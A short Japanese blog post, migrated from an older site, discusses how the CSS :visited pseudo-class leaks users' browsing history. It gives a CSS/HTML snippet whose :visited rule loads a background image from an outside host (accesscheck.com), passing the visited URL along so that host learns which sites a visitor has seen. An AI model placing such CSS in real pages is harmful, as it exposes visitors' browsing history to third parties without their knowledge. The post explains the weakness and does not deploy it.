This article was migrated from http://rails.office.drecom.jp/takiuchi/archive/83

brazilさんのエントリ「そのリソースを訪問済みか判定する」で、visited擬似クラスによって訪問済みサイトの情報が漏洩してしまうという事が指摘されています。

確かにいろいろまずそうですね…。addRuleを使わなくても、background-imageとかで外部URLを指定して、そこへのアクセスを調べたら、動的にvisitedのルールを追加できなくても同じ事が出来そうです。

<style>
a#url-1:visited {
  background-image: url("http://accesscheck.com/?url=http://foo.bar.com/");
}
</style>
<a id="url-1" href="http://foo.bar.com/">foo.bar.com</a>

This article was migrated from http://rails.office.drecom.jp/takiuchi/archive/83